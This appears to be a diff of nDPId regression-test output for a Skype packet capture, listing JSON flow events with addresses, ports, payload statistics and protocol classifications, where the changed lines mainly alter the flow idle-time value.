00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":180000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1431969793871,"flow_last_seen":1431969802019,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 